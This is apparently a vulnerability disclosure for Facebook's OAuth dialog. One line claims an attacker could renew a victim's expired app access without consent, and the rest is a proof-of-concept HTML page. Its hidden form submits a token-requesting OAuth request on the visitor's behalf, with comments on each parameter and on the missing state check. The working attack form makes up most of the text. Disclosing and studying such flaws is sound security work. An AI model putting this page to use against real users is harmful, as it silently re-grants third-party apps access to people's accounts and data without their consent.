It was possible for an attacker to renew access to Apps
which have expired for the victim without the victim's consent. POC:
=========================================================================
=========================================================================
<html>
<!-- POC: a third-party page that submits a Facebook OAuth dialog request on the
     visitor's behalf. APP_ID and APP_CALLBACK_DOMAIN are placeholders for the
     affected app's id and its registered callback domain; the hex ids in the
     channel_url / redirect_uri fragments and logger_id are values captured from
     one SDK session (presumably not required to be fresh — verify). -->
<body>
<!-- Rewrites the visible address-bar path to "/" without navigating; cosmetic only,
     the request below is issued by the form. -->
<script>history.pushState('', '', '/')</script>
<!-- No method attribute, so this is a GET to the OAuth dialog with every parameter
     supplied as a hidden field; the only user interaction is the submit click. -->
<form action="https://www.facebook.com/v2.3/dialog/oauth">
<input type="hidden" name="app_id" value="APP_ID" />
<!-- auth_type is sent empty; presumably no re-authentication / re-request prompt is
     forced — confirm against the dialog's documented behaviour. -->
<input type="hidden" name="auth_type" value="" />
<input type="hidden" name="cbt" value="1622970398155" />
<!-- channel_url and redirect_uri both point at Facebook's own xd_arbiter endpoint,
     carrying the app's domain and origin in the URL fragment — the shape the JS SDK
     flow uses (sdk=joey below). -->
<input type="hidden" name="channel_url" value="https://staticxx.facebook.com/x/connect/xd_arbiter/?version=46#cb=f11c70b8d77d13&domain=www.APP_CALLBACK_DOMAIN.com&origin=https%3A%2F%2Fwww.APP_CALLBACK_DOMAIN.com%2Ff1e7baa12b0f5a4&relation=opener" />
<input type="hidden" name="client_id" value="APP_ID" />
<input type="hidden" name="display" value="popup" />
<input type="hidden" name="domain" value="www.APP_CALLBACK_DOMAIN.com" />
<input type="hidden" name="e2e" value="{}" />
<input type="hidden" name="fallback_redirect_uri" value="https://www.APP_CALLBACK_DOMAIN.com/signup?redirect=/" />
<input type="hidden" name="fx_app" value="facebook" />
<input type="hidden" name="locale" value="en_US" />
<input type="hidden" name="logger_id" value="f256cfb96281ce4" />
<input type="hidden" name="origin" value="1" />
<input type="hidden" name="redirect_uri" value="https://staticxx.facebook.com/x/connect/xd_arbiter/?version=46#cb=f232d7fd018cdac&domain=www.APP_CALLBACK_DOMAIN.com&origin=https%3A%2F%2Fwww.APP_CALLBACK_DOMAIN.com%2Ff1e7baa12b0f5a4&relation=opener&frame=f3505dbd2db68" />
<!-- Asks for the access token (plus signed_request and graph_domain) directly in the
     dialog response rather than an authorization code. -->
<input type="hidden" name="response_type" value="token,signed_request,graph_domain" />
<input type="hidden" name="return_scopes" value="false" />
<input type="hidden" name="scope" value="public_profile,email" />
<input type="hidden" name="sdk" value="joey" />
<input type="hidden" name="version" value="v2.3" />
<!-- NOTE(review): the form carries no state parameter, so nothing in the request is
     bound to the victim's session with the app; binding the dialog request to a
     per-session state value and checking it on the callback is the standard
     client-side mitigation. Whether the silent re-grant itself is a dialog-side
     check that was missing is the report's claim — confirm server side. -->
<input type="submit" value="Submit request" />
</form>
</body>
</html>
=========================================================================
=========================================================================